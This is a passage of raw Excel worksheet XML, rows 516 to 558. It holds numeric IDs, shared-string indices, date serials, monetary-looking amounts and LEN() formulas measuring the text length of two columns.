        <v>68</v>
      </c>
      <c r="L516">
        <f>LEN(J516)</f>
        <v>40</v>
      </c>
    </row>
    <row r="517" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A517">
        <v>19928</v>
      </c>
      <c r="B517">
        <v>2611</v>
      </c>
      <c r="C517" t="s">
        <v>5505</v>
      </c>
      <c r="D517" t="s">
        <v>10332</v>
      </c>
      <c r="E517">
        <v>19</v>
      </c>
      <c r="F517" t="s">
        <v>9437</v>
      </c>
      <c r="G517" s="1">
        <v>43881</v>
      </c>
      <c r="H517">
        <v>50000</v>
      </c>
      <c r="I517" t="s">
        <v>10340</v>
      </c>
      <c r="J517" t="s">
        <v>10338</v>
      </c>
      <c r="K517">
        <f>LEN(I517)</f>
        <v>68</v>
      </c>
      <c r="L517">
        <f>LEN(J517)</f>
        <v>40</v>
      </c>
    </row>
    <row r="518" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A518">
        <v>19929</v>
      </c>
      <c r="B518">
        <v>2611</v>
      </c>
      <c r="C518" t="s">
        <v>5505</v>
      </c>
      <c r="D518" t="s">
        <v>10332</v>
      </c>
      <c r="E518">
        <v>19</v>
      </c>
      <c r="F518" t="s">
        <v>9527</v>
      </c>
      <c r="G518" s="1">
        <v>43881</v>
      </c>
      <c r="H518">
        <v>50000</v>
      </c>
      <c r="I518" t="s">
        <v>10340</v>
      </c>
      <c r="J518" t="s">
        <v>10338</v>
      </c>
      <c r="K518">
        <f>LEN(I518)</f>
        <v>68</v>
      </c>
      <c r="L518">
        <f>LEN(J518)</f>
        <v>40</v>
      </c>
    </row>
    <row r="519" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A519">
        <v>19930</v>
      </c>
      <c r="B519">
        <v>2611</v>
      </c>
      <c r="C519" t="s">
        <v>5505</v>
      </c>
      <c r="D519" t="s">
        <v>10332</v>
      </c>
      <c r="E519">
        <v>19</v>
      </c>
      <c r="F519" t="s">
        <v>1746</v>
      </c>
      <c r="G519" s="1">
        <v>43881</v>
      </c>
      <c r="H519">
        <v>50000</v>
      </c>
      <c r="I519" t="s">
        <v>10340</v>
      </c>
      <c r="J519" t="s">
        <v>10338</v>
      </c>
      <c r="K519">
        <f>LEN(I519)</f>
        <v>68</v>
      </c>
      <c r="L519">
        <f>LEN(J519)</f>
        <v>40</v>
      </c>
    </row>
    <row r="520" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A520">
        <v>19931</v>
      </c>
      <c r="B520">
        <v>2611</v>
      </c>
      <c r="C520" t="s">
        <v>5505</v>
      </c>
      <c r="D520" t="s">
        <v>10332</v>
      </c>
      <c r="E520">
        <v>19</v>
      </c>
      <c r="F520" t="s">
        <v>3814</v>
      </c>
      <c r="G520" s="1">
        <v>43881</v>
      </c>
      <c r="H520">
        <v>50000</v>
      </c>
      <c r="I520" t="s">
        <v>10340</v>
      </c>
      <c r="J520" t="s">
        <v>10338</v>
      </c>
      <c r="K520">
        <f>LEN(I520)</f>
        <v>68</v>
      </c>
      <c r="L520">
        <f>LEN(J520)</f>
        <v>40</v>
      </c>
    </row>
    <row r="521" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A521">
        <v>19988</v>
      </c>
      <c r="B521">
        <v>633</v>
      </c>
      <c r="C521" t="s">
        <v>642</v>
      </c>
      <c r="D521" t="s">
        <v>10376</v>
      </c>
      <c r="E521">
        <v>26</v>
      </c>
      <c r="F521" t="s">
        <v>5434</v>
      </c>
      <c r="G521" s="1">
        <v>43920</v>
      </c>
      <c r="H521">
        <v>20000</v>
      </c>
      <c r="I521" t="s">
        <v>10381</v>
      </c>
      <c r="J521" t="s">
        <v>10382</v>
      </c>
      <c r="K521">
        <f>LEN(I521)</f>
        <v>62</v>
      </c>
      <c r="L521">
        <f>LEN(J521)</f>
        <v>40</v>
      </c>
    </row>
    <row r="522" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A522">
        <v>17431</v>
      </c>
      <c r="B522">
        <v>2241</v>
      </c>
      <c r="C522" t="s">
        <v>5775</v>
      </c>
      <c r="D522" t="s">
        <v>9743</v>
      </c>
      <c r="E522">
        <v>16</v>
      </c>
      <c r="F522" t="s">
        <v>9786</v>
      </c>
      <c r="G522" s="1">
        <v>43907</v>
      </c>
      <c r="H522">
        <v>900000</v>
      </c>
      <c r="J522" t="s">
        <v>9787</v>
      </c>
      <c r="K522">
        <f>LEN(I522)</f>
        <v>0</v>
      </c>
      <c r="L522">
        <f>LEN(J522)</f>
        <v>40</v>
      </c>
    </row>
    <row r="523" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A523">
        <v>19358</v>
      </c>
      <c r="B523">
        <v>1367</v>
      </c>
      <c r="C523" t="s">
        <v>2629</v>
      </c>
      <c r="D523" t="s">
        <v>9953</v>
      </c>
      <c r="E523">
        <v>16</v>
      </c>
      <c r="F523" t="s">
        <v>9458</v>
      </c>
      <c r="G523" s="1">
        <v>43885</v>
      </c>
      <c r="H523">
        <v>50000</v>
      </c>
      <c r="J523" t="s">
        <v>9954</v>
      </c>
      <c r="K523">
        <f>LEN(I523)</f>
        <v>0</v>
      </c>
      <c r="L523">
        <f>LEN(J523)</f>
        <v>40</v>
      </c>
    </row>
    <row r="524" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A524">
        <v>19359</v>
      </c>
      <c r="B524">
        <v>1367</v>
      </c>
      <c r="C524" t="s">
        <v>2629</v>
      </c>
      <c r="D524" t="s">
        <v>9953</v>
      </c>
      <c r="E524">
        <v>16</v>
      </c>
      <c r="F524" t="s">
        <v>9955</v>
      </c>
      <c r="G524" s="1">
        <v>43885</v>
      </c>
      <c r="H524">
        <v>50000</v>
      </c>
      <c r="J524" t="s">
        <v>9954</v>
      </c>
      <c r="K524">
        <f>LEN(I524)</f>
        <v>0</v>
      </c>
      <c r="L524">
        <f>LEN(J524)</f>
        <v>40</v>
      </c>
    </row>
    <row r="525" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A525">
        <v>20722</v>
      </c>
      <c r="B525">
        <v>2332</v>
      </c>
      <c r="C525" t="s">
        <v>5974</v>
      </c>
      <c r="D525" t="s">
        <v>9594</v>
      </c>
      <c r="E525">
        <v>13</v>
      </c>
      <c r="F525" t="s">
        <v>609</v>
      </c>
      <c r="G525" s="1">
        <v>44000</v>
      </c>
      <c r="H525">
        <v>50000</v>
      </c>
      <c r="I525" t="s">
        <v>10931</v>
      </c>
      <c r="J525" t="s">
        <v>10932</v>
      </c>
      <c r="K525">
        <f>LEN(I525)</f>
        <v>47</v>
      </c>
      <c r="L525">
        <f>LEN(J525)</f>
        <v>39</v>
      </c>
    </row>
    <row r="526" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A526">
        <v>21295</v>
      </c>
      <c r="B526">
        <v>444</v>
      </c>
      <c r="C526" t="s">
        <v>1595</v>
      </c>
      <c r="D526" t="s">
        <v>11264</v>
      </c>
      <c r="E526">
        <v>16</v>
      </c>
      <c r="F526" t="s">
        <v>9928</v>
      </c>
      <c r="G526" s="1">
        <v>44155</v>
      </c>
      <c r="H526">
        <v>0</v>
      </c>
      <c r="I526" t="s">
        <v>11276</v>
      </c>
      <c r="J526" t="s">
        <v>10075</v>
      </c>
      <c r="K526">
        <f>LEN(I526)</f>
        <v>72</v>
      </c>
      <c r="L526">
        <f>LEN(J526)</f>
        <v>38</v>
      </c>
    </row>
    <row r="527" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A527">
        <v>21290</v>
      </c>
      <c r="B527">
        <v>444</v>
      </c>
      <c r="C527" t="s">
        <v>1595</v>
      </c>
      <c r="D527" t="s">
        <v>11264</v>
      </c>
      <c r="E527">
        <v>16</v>
      </c>
      <c r="F527" t="s">
        <v>9527</v>
      </c>
      <c r="G527" s="1">
        <v>44155</v>
      </c>
      <c r="H527">
        <v>0</v>
      </c>
      <c r="I527" t="s">
        <v>11269</v>
      </c>
      <c r="J527" t="s">
        <v>10075</v>
      </c>
      <c r="K527">
        <f>LEN(I527)</f>
        <v>58</v>
      </c>
      <c r="L527">
        <f>LEN(J527)</f>
        <v>38</v>
      </c>
    </row>
    <row r="528" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A528">
        <v>21291</v>
      </c>
      <c r="B528">
        <v>444</v>
      </c>
      <c r="C528" t="s">
        <v>1595</v>
      </c>
      <c r="D528" t="s">
        <v>11264</v>
      </c>
      <c r="E528">
        <v>16</v>
      </c>
      <c r="F528" t="s">
        <v>11270</v>
      </c>
      <c r="G528" s="1">
        <v>44155</v>
      </c>
      <c r="H528">
        <v>0</v>
      </c>
      <c r="I528" t="s">
        <v>11271</v>
      </c>
      <c r="J528" t="s">
        <v>10075</v>
      </c>
      <c r="K528">
        <f>LEN(I528)</f>
        <v>57</v>
      </c>
      <c r="L528">
        <f>LEN(J528)</f>
        <v>38</v>
      </c>
    </row>
    <row r="529" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A529">
        <v>21292</v>
      </c>
      <c r="B529">
        <v>444</v>
      </c>
      <c r="C529" t="s">
        <v>1595</v>
      </c>
      <c r="D529" t="s">
        <v>11264</v>
      </c>
      <c r="E529">
        <v>16</v>
      </c>
      <c r="F529" t="s">
        <v>11272</v>
      </c>
      <c r="G529" s="1">
        <v>44155</v>
      </c>
      <c r="H529">
        <v>0</v>
      </c>
      <c r="I529" t="s">
        <v>11273</v>
      </c>
      <c r="J529" t="s">
        <v>10075</v>
      </c>
      <c r="K529">
        <f>LEN(I529)</f>
        <v>55</v>
      </c>
      <c r="L529">
        <f>LEN(J529)</f>
        <v>38</v>
      </c>
    </row>
    <row r="530" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A530">
        <v>21293</v>
      </c>
      <c r="B530">
        <v>444</v>
      </c>
      <c r="C530" t="s">
        <v>1595</v>
      </c>
      <c r="D530" t="s">
        <v>11264</v>
      </c>
      <c r="E530">
        <v>16</v>
      </c>
      <c r="F530" t="s">
        <v>11274</v>
      </c>
      <c r="G530" s="1">
        <v>44155</v>
      </c>
      <c r="H530">
        <v>0</v>
      </c>
      <c r="I530" t="s">
        <v>11275</v>
      </c>
      <c r="J530" t="s">
        <v>10075</v>
      </c>
      <c r="K530">
        <f>LEN(I530)</f>
        <v>50</v>
      </c>
      <c r="L530">
        <f>LEN(J530)</f>
        <v>38</v>
      </c>
    </row>
    <row r="531" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A531">
        <v>19616</v>
      </c>
      <c r="B531">
        <v>2562</v>
      </c>
      <c r="C531" t="s">
        <v>4285</v>
      </c>
      <c r="D531" t="s">
        <v>10131</v>
      </c>
      <c r="E531">
        <v>13</v>
      </c>
      <c r="F531" t="s">
        <v>3242</v>
      </c>
      <c r="G531" s="1">
        <v>43861</v>
      </c>
      <c r="H531">
        <v>1500000</v>
      </c>
      <c r="I531" t="s">
        <v>9536</v>
      </c>
      <c r="J531" t="s">
        <v>10132</v>
      </c>
      <c r="K531">
        <f>LEN(I531)</f>
        <v>13</v>
      </c>
      <c r="L531">
        <f>LEN(J531)</f>
        <v>38</v>
      </c>
    </row>
    <row r="532" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A532">
        <v>19477</v>
      </c>
      <c r="B532">
        <v>1097</v>
      </c>
      <c r="C532" t="s">
        <v>2497</v>
      </c>
      <c r="D532" t="s">
        <v>10074</v>
      </c>
      <c r="E532">
        <v>26</v>
      </c>
      <c r="F532" t="s">
        <v>9523</v>
      </c>
      <c r="G532" s="1">
        <v>44085</v>
      </c>
      <c r="H532">
        <v>60000</v>
      </c>
      <c r="J532" t="s">
        <v>10075</v>
      </c>
      <c r="K532">
        <f>LEN(I532)</f>
        <v>0</v>
      </c>
      <c r="L532">
        <f>LEN(J532)</f>
        <v>38</v>
      </c>
    </row>
    <row r="533" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A533">
        <v>19478</v>
      </c>
      <c r="B533">
        <v>1097</v>
      </c>
      <c r="C533" t="s">
        <v>2497</v>
      </c>
      <c r="D533" t="s">
        <v>10074</v>
      </c>
      <c r="E533">
        <v>26</v>
      </c>
      <c r="F533" t="s">
        <v>9681</v>
      </c>
      <c r="G533" s="1">
        <v>44085</v>
      </c>
      <c r="H533">
        <v>60000</v>
      </c>
      <c r="J533" t="s">
        <v>10075</v>
      </c>
      <c r="K533">
        <f>LEN(I533)</f>
        <v>0</v>
      </c>
      <c r="L533">
        <f>LEN(J533)</f>
        <v>38</v>
      </c>
    </row>
    <row r="534" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A534">
        <v>19608</v>
      </c>
      <c r="B534">
        <v>1536</v>
      </c>
      <c r="C534" t="s">
        <v>2718</v>
      </c>
      <c r="D534" t="s">
        <v>10126</v>
      </c>
      <c r="E534">
        <v>14</v>
      </c>
      <c r="F534" t="s">
        <v>9642</v>
      </c>
      <c r="G534" s="1">
        <v>43908</v>
      </c>
      <c r="H534">
        <v>500000</v>
      </c>
      <c r="J534" t="s">
        <v>10075</v>
      </c>
      <c r="K534">
        <f>LEN(I534)</f>
        <v>0</v>
      </c>
      <c r="L534">
        <f>LEN(J534)</f>
        <v>38</v>
      </c>
    </row>
    <row r="535" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A535">
        <v>19733</v>
      </c>
      <c r="B535">
        <v>796</v>
      </c>
      <c r="C535" t="s">
        <v>467</v>
      </c>
      <c r="D535" t="s">
        <v>9770</v>
      </c>
      <c r="E535">
        <v>2</v>
      </c>
      <c r="F535" t="s">
        <v>4508</v>
      </c>
      <c r="G535" s="1">
        <v>43861</v>
      </c>
      <c r="H535">
        <v>8000</v>
      </c>
      <c r="J535" t="s">
        <v>10075</v>
      </c>
      <c r="K535">
        <f>LEN(I535)</f>
        <v>0</v>
      </c>
      <c r="L535">
        <f>LEN(J535)</f>
        <v>38</v>
      </c>
    </row>
    <row r="536" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A536">
        <v>19849</v>
      </c>
      <c r="B536">
        <v>373</v>
      </c>
      <c r="C536" t="s">
        <v>535</v>
      </c>
      <c r="D536" t="s">
        <v>10281</v>
      </c>
      <c r="E536">
        <v>16</v>
      </c>
      <c r="F536" t="s">
        <v>673</v>
      </c>
      <c r="G536" s="1">
        <v>43935</v>
      </c>
      <c r="H536">
        <v>3600000</v>
      </c>
      <c r="J536" t="s">
        <v>10282</v>
      </c>
      <c r="K536">
        <f>LEN(I536)</f>
        <v>0</v>
      </c>
      <c r="L536">
        <f>LEN(J536)</f>
        <v>38</v>
      </c>
    </row>
    <row r="537" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A537">
        <v>19911</v>
      </c>
      <c r="B537">
        <v>949</v>
      </c>
      <c r="C537" t="s">
        <v>2621</v>
      </c>
      <c r="D537" t="s">
        <v>9987</v>
      </c>
      <c r="E537">
        <v>17</v>
      </c>
      <c r="F537" t="s">
        <v>9527</v>
      </c>
      <c r="G537" s="1">
        <v>43909</v>
      </c>
      <c r="H537">
        <v>60000</v>
      </c>
      <c r="J537" t="s">
        <v>10326</v>
      </c>
      <c r="K537">
        <f>LEN(I537)</f>
        <v>0</v>
      </c>
      <c r="L537">
        <f>LEN(J537)</f>
        <v>38</v>
      </c>
    </row>
    <row r="538" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A538">
        <v>20014</v>
      </c>
      <c r="B538">
        <v>346</v>
      </c>
      <c r="C538" t="s">
        <v>570</v>
      </c>
      <c r="D538" t="s">
        <v>10396</v>
      </c>
      <c r="E538">
        <v>13</v>
      </c>
      <c r="F538" t="s">
        <v>9437</v>
      </c>
      <c r="G538" s="1">
        <v>43937</v>
      </c>
      <c r="H538">
        <v>100000</v>
      </c>
      <c r="J538" t="s">
        <v>10075</v>
      </c>
      <c r="K538">
        <f>LEN(I538)</f>
        <v>0</v>
      </c>
      <c r="L538">
        <f>LEN(J538)</f>
        <v>38</v>
      </c>
    </row>
    <row r="539" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A539">
        <v>20015</v>
      </c>
      <c r="B539">
        <v>346</v>
      </c>
      <c r="C539" t="s">
        <v>570</v>
      </c>
      <c r="D539" t="s">
        <v>10396</v>
      </c>
      <c r="E539">
        <v>13</v>
      </c>
      <c r="F539" t="s">
        <v>10397</v>
      </c>
      <c r="G539" s="1">
        <v>43937</v>
      </c>
      <c r="H539">
        <v>5000</v>
      </c>
      <c r="J539" t="s">
        <v>10075</v>
      </c>
      <c r="K539">
        <f>LEN(I539)</f>
        <v>0</v>
      </c>
      <c r="L539">
        <f>LEN(J539)</f>
        <v>38</v>
      </c>
    </row>
    <row r="540" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A540">
        <v>20016</v>
      </c>
      <c r="B540">
        <v>346</v>
      </c>
      <c r="C540" t="s">
        <v>570</v>
      </c>
      <c r="D540" t="s">
        <v>10396</v>
      </c>
      <c r="E540">
        <v>13</v>
      </c>
      <c r="F540" t="s">
        <v>10398</v>
      </c>
      <c r="G540" s="1">
        <v>43937</v>
      </c>
      <c r="H540">
        <v>5000</v>
      </c>
      <c r="J540" t="s">
        <v>10075</v>
      </c>
      <c r="K540">
        <f>LEN(I540)</f>
        <v>0</v>
      </c>
      <c r="L540">
        <f>LEN(J540)</f>
        <v>38</v>
      </c>
    </row>
    <row r="541" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A541">
        <v>20017</v>
      </c>
      <c r="B541">
        <v>346</v>
      </c>
      <c r="C541" t="s">
        <v>570</v>
      </c>
      <c r="D541" t="s">
        <v>10396</v>
      </c>
      <c r="E541">
        <v>13</v>
      </c>
      <c r="F541" t="s">
        <v>10399</v>
      </c>
      <c r="G541" s="1">
        <v>43937</v>
      </c>
      <c r="H541">
        <v>5000</v>
      </c>
      <c r="J541" t="s">
        <v>10075</v>
      </c>
      <c r="K541">
        <f>LEN(I541)</f>
        <v>0</v>
      </c>
      <c r="L541">
        <f>LEN(J541)</f>
        <v>38</v>
      </c>
    </row>
    <row r="542" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A542">
        <v>20018</v>
      </c>
      <c r="B542">
        <v>346</v>
      </c>
      <c r="C542" t="s">
        <v>570</v>
      </c>
      <c r="D542" t="s">
        <v>10396</v>
      </c>
      <c r="E542">
        <v>13</v>
      </c>
      <c r="F542" t="s">
        <v>1746</v>
      </c>
      <c r="G542" s="1">
        <v>43937</v>
      </c>
      <c r="H542">
        <v>1000</v>
      </c>
      <c r="J542" t="s">
        <v>10075</v>
      </c>
      <c r="K542">
        <f>LEN(I542)</f>
        <v>0</v>
      </c>
      <c r="L542">
        <f>LEN(J542)</f>
        <v>38</v>
      </c>
    </row>
    <row r="543" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A543">
        <v>20526</v>
      </c>
      <c r="B543">
        <v>1764</v>
      </c>
      <c r="C543" t="s">
        <v>5918</v>
      </c>
      <c r="D543" t="s">
        <v>10772</v>
      </c>
      <c r="E543">
        <v>5</v>
      </c>
      <c r="F543" t="s">
        <v>10773</v>
      </c>
      <c r="G543" s="1">
        <v>43943</v>
      </c>
      <c r="H543">
        <v>300000</v>
      </c>
      <c r="J543" t="s">
        <v>10774</v>
      </c>
      <c r="K543">
        <f>LEN(I543)</f>
        <v>0</v>
      </c>
      <c r="L543">
        <f>LEN(J543)</f>
        <v>38</v>
      </c>
    </row>
    <row r="544" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A544">
        <v>20542</v>
      </c>
      <c r="B544">
        <v>1764</v>
      </c>
      <c r="C544" t="s">
        <v>5918</v>
      </c>
      <c r="D544" t="s">
        <v>10772</v>
      </c>
      <c r="E544">
        <v>5</v>
      </c>
      <c r="F544" t="s">
        <v>10790</v>
      </c>
      <c r="G544" s="1">
        <v>43943</v>
      </c>
      <c r="H544">
        <v>300000</v>
      </c>
      <c r="J544" t="s">
        <v>10774</v>
      </c>
      <c r="K544">
        <f>LEN(I544)</f>
        <v>0</v>
      </c>
      <c r="L544">
        <f>LEN(J544)</f>
        <v>38</v>
      </c>
    </row>
    <row r="545" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A545">
        <v>20547</v>
      </c>
      <c r="B545">
        <v>1764</v>
      </c>
      <c r="C545" t="s">
        <v>5918</v>
      </c>
      <c r="D545" t="s">
        <v>10772</v>
      </c>
      <c r="E545">
        <v>5</v>
      </c>
      <c r="F545" t="s">
        <v>10794</v>
      </c>
      <c r="G545" s="1">
        <v>43943</v>
      </c>
      <c r="H545">
        <v>300000</v>
      </c>
      <c r="J545" t="s">
        <v>10774</v>
      </c>
      <c r="K545">
        <f>LEN(I545)</f>
        <v>0</v>
      </c>
      <c r="L545">
        <f>LEN(J545)</f>
        <v>38</v>
      </c>
    </row>
    <row r="546" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A546">
        <v>20681</v>
      </c>
      <c r="B546">
        <v>1764</v>
      </c>
      <c r="C546" t="s">
        <v>5918</v>
      </c>
      <c r="D546" t="s">
        <v>10772</v>
      </c>
      <c r="E546">
        <v>5</v>
      </c>
      <c r="F546" t="s">
        <v>7241</v>
      </c>
      <c r="G546" s="1">
        <v>43943</v>
      </c>
      <c r="H546">
        <v>600000</v>
      </c>
      <c r="J546" t="s">
        <v>10774</v>
      </c>
      <c r="K546">
        <f>LEN(I546)</f>
        <v>0</v>
      </c>
      <c r="L546">
        <f>LEN(J546)</f>
        <v>38</v>
      </c>
    </row>
    <row r="547" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A547">
        <v>20732</v>
      </c>
      <c r="B547">
        <v>881</v>
      </c>
      <c r="C547" t="s">
        <v>3043</v>
      </c>
      <c r="D547" t="s">
        <v>10939</v>
      </c>
      <c r="E547">
        <v>2</v>
      </c>
      <c r="F547" t="s">
        <v>9849</v>
      </c>
      <c r="G547" s="1">
        <v>43994</v>
      </c>
      <c r="H547">
        <v>40000</v>
      </c>
      <c r="J547" t="s">
        <v>10075</v>
      </c>
      <c r="K547">
        <f>LEN(I547)</f>
        <v>0</v>
      </c>
      <c r="L547">
        <f>LEN(J547)</f>
        <v>38</v>
      </c>
    </row>
    <row r="548" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A548">
        <v>21126</v>
      </c>
      <c r="B548">
        <v>895</v>
      </c>
      <c r="C548" t="s">
        <v>3150</v>
      </c>
      <c r="D548" t="s">
        <v>11158</v>
      </c>
      <c r="E548">
        <v>16</v>
      </c>
      <c r="F548" t="s">
        <v>11159</v>
      </c>
      <c r="G548" s="1">
        <v>44048</v>
      </c>
      <c r="H548">
        <v>240000</v>
      </c>
      <c r="J548" t="s">
        <v>10075</v>
      </c>
      <c r="K548">
        <f>LEN(I548)</f>
        <v>0</v>
      </c>
      <c r="L548">
        <f>LEN(J548)</f>
        <v>38</v>
      </c>
    </row>
    <row r="549" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A549">
        <v>21168</v>
      </c>
      <c r="B549">
        <v>541</v>
      </c>
      <c r="C549" t="s">
        <v>1159</v>
      </c>
      <c r="D549" t="s">
        <v>11179</v>
      </c>
      <c r="E549">
        <v>16</v>
      </c>
      <c r="F549" t="s">
        <v>9642</v>
      </c>
      <c r="G549" s="1">
        <v>44034</v>
      </c>
      <c r="H549">
        <v>7000</v>
      </c>
      <c r="J549" t="s">
        <v>10075</v>
      </c>
      <c r="K549">
        <f>LEN(I549)</f>
        <v>0</v>
      </c>
      <c r="L549">
        <f>LEN(J549)</f>
        <v>38</v>
      </c>
    </row>
    <row r="550" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A550">
        <v>21282</v>
      </c>
      <c r="B550">
        <v>444</v>
      </c>
      <c r="C550" t="s">
        <v>1595</v>
      </c>
      <c r="D550" t="s">
        <v>11264</v>
      </c>
      <c r="E550">
        <v>16</v>
      </c>
      <c r="F550" t="s">
        <v>1746</v>
      </c>
      <c r="G550" s="1">
        <v>44155</v>
      </c>
      <c r="H550">
        <v>0</v>
      </c>
      <c r="J550" t="s">
        <v>10075</v>
      </c>
      <c r="K550">
        <f>LEN(I550)</f>
        <v>0</v>
      </c>
      <c r="L550">
        <f>LEN(J550)</f>
        <v>38</v>
      </c>
    </row>
    <row r="551" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A551">
        <v>21285</v>
      </c>
      <c r="B551">
        <v>444</v>
      </c>
      <c r="C551" t="s">
        <v>1595</v>
      </c>
      <c r="D551" t="s">
        <v>11264</v>
      </c>
      <c r="E551">
        <v>16</v>
      </c>
      <c r="F551" t="s">
        <v>11265</v>
      </c>
      <c r="G551" s="1">
        <v>44155</v>
      </c>
      <c r="H551">
        <v>121678</v>
      </c>
      <c r="J551" t="s">
        <v>10075</v>
      </c>
      <c r="K551">
        <f>LEN(I551)</f>
        <v>0</v>
      </c>
      <c r="L551">
        <f>LEN(J551)</f>
        <v>38</v>
      </c>
    </row>
    <row r="552" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A552">
        <v>21286</v>
      </c>
      <c r="B552">
        <v>444</v>
      </c>
      <c r="C552" t="s">
        <v>1595</v>
      </c>
      <c r="D552" t="s">
        <v>11264</v>
      </c>
      <c r="E552">
        <v>16</v>
      </c>
      <c r="F552" t="s">
        <v>11266</v>
      </c>
      <c r="G552" s="1">
        <v>44155</v>
      </c>
      <c r="H552">
        <v>69214</v>
      </c>
      <c r="J552" t="s">
        <v>10075</v>
      </c>
      <c r="K552">
        <f>LEN(I552)</f>
        <v>0</v>
      </c>
      <c r="L552">
        <f>LEN(J552)</f>
        <v>38</v>
      </c>
    </row>
    <row r="553" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A553">
        <v>21288</v>
      </c>
      <c r="B553">
        <v>444</v>
      </c>
      <c r="C553" t="s">
        <v>1595</v>
      </c>
      <c r="D553" t="s">
        <v>11264</v>
      </c>
      <c r="E553">
        <v>16</v>
      </c>
      <c r="F553" t="s">
        <v>11268</v>
      </c>
      <c r="G553" s="1">
        <v>44155</v>
      </c>
      <c r="H553">
        <v>0</v>
      </c>
      <c r="J553" t="s">
        <v>10075</v>
      </c>
      <c r="K553">
        <f>LEN(I553)</f>
        <v>0</v>
      </c>
      <c r="L553">
        <f>LEN(J553)</f>
        <v>38</v>
      </c>
    </row>
    <row r="554" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A554">
        <v>21294</v>
      </c>
      <c r="B554">
        <v>444</v>
      </c>
      <c r="C554" t="s">
        <v>1595</v>
      </c>
      <c r="D554" t="s">
        <v>11264</v>
      </c>
      <c r="E554">
        <v>16</v>
      </c>
      <c r="F554" t="s">
        <v>3814</v>
      </c>
      <c r="G554" s="1">
        <v>44155</v>
      </c>
      <c r="H554">
        <v>0</v>
      </c>
      <c r="J554" t="s">
        <v>10075</v>
      </c>
      <c r="K554">
        <f>LEN(I554)</f>
        <v>0</v>
      </c>
      <c r="L554">
        <f>LEN(J554)</f>
        <v>38</v>
      </c>
    </row>
    <row r="555" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A555">
        <v>19371</v>
      </c>
      <c r="B555">
        <v>766</v>
      </c>
      <c r="C555" t="s">
        <v>307</v>
      </c>
      <c r="D555" t="s">
        <v>9963</v>
      </c>
      <c r="E555">
        <v>16</v>
      </c>
      <c r="F555" t="s">
        <v>2105</v>
      </c>
      <c r="G555" s="1">
        <v>43986</v>
      </c>
      <c r="H555">
        <v>300000</v>
      </c>
      <c r="I555" t="s">
        <v>9974</v>
      </c>
      <c r="J555" t="s">
        <v>9975</v>
      </c>
      <c r="K555">
        <f>LEN(I555)</f>
        <v>106</v>
      </c>
      <c r="L555">
        <f>LEN(J555)</f>
        <v>37</v>
      </c>
    </row>
    <row r="556" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A556">
        <v>20099</v>
      </c>
      <c r="B556">
        <v>2615</v>
      </c>
      <c r="C556" t="s">
        <v>5527</v>
      </c>
      <c r="D556" t="s">
        <v>10464</v>
      </c>
      <c r="E556">
        <v>18</v>
      </c>
      <c r="F556" t="s">
        <v>9610</v>
      </c>
      <c r="G556" s="1">
        <v>43944</v>
      </c>
      <c r="H556">
        <v>1000</v>
      </c>
      <c r="I556" t="s">
        <v>10465</v>
      </c>
      <c r="J556" t="s">
        <v>10285</v>
      </c>
      <c r="K556">
        <f>LEN(I556)</f>
        <v>72</v>
      </c>
      <c r="L556">
        <f>LEN(J556)</f>
        <v>37</v>
      </c>
    </row>
    <row r="557" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A557">
        <v>20908</v>
      </c>
      <c r="B557">
        <v>227</v>
      </c>
      <c r="C557" t="s">
        <v>671</v>
      </c>
      <c r="D557" t="s">
        <v>11054</v>
      </c>
      <c r="E557">
        <v>16</v>
      </c>
      <c r="F557" t="s">
        <v>9441</v>
      </c>
      <c r="G557" s="1">
        <v>43971</v>
      </c>
      <c r="H557">
        <v>2496000</v>
      </c>
      <c r="I557" t="s">
        <v>11056</v>
      </c>
      <c r="J557" t="s">
        <v>11057</v>
      </c>
      <c r="K557">
        <f>LEN(I557)</f>
        <v>58</v>
      </c>
      <c r="L557">
        <f>LEN(J557)</f>
        <v>37</v>
      </c>
    </row>
    <row r="558" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A558">
        <v>20513</v>
      </c>
      <c r="B558">
        <v>2700</v>
      </c>
      <c r="C558" t="s">
        <v>5810</v>
      </c>
      <c r="D558" t="s">
        <v>10760</v>
      </c>
      <c r="E558">
        <v>18</v>
      </c>
      <c r="F558" t="s">
        <v>9523</v>
      </c>
      <c r="G558" s="1">
        <v>43930</v>
      </c>
      <c r="H558">
        <v>6000</v>
      </c>
      <c r="I558" t="s">
        <v>10762</v>
      </c>
      <c r="J558" t="s">
        <v>10763</v>
      </c>
      <c r="K558">
        <f>LEN(I558)</f>
        <v>37</v>
      </c>
      <c r="L558">
        <f>LEN(J558)</f>
        <v>37</v>
      </c>
    </row>
